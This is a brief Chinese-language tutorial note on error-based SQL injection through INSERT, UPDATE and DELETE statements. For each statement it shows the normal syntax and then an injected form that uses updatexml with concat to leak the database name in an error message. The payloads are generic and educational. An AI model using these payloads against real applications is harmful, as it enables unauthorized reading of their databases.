insert、update和delete注入
insert:插入语法
insert into 表名 (参数1,参数2,参数3) values (x,y,z);
注入语句:
insert into user (id, username,password) values ('4','w64654ll'or updatexml(1,concat(0x7e,database()),0),'233');
update:更新语法
update 表名 set 列名1= x where 列名2 =y
列名1:需要更改成的列名的值x;
列名2:需要被更改的列名的值y;
注入语句:
update user set password =111 or updatexml(1,concat(0x7e,database()),0) where id =4;
delete:删除语法
delete from 表名 where 列名=x
删除列名为x的列
注入语句:
delete from user where id = 1 or updatexml(1,concat(0x7e,database()),0);